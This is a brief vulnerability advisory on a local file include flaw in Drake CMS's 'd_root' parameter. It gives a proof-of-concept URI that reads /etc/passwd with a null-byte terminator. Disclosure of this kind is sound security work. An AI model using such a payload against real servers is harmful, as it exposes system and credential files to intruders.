Drake CMS 'd_root' Parameter Local File Include Vulnerability

Drake CMS 'd_root' Parameter Local File Include Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/install/index.php?d_root=/etc/passwd%00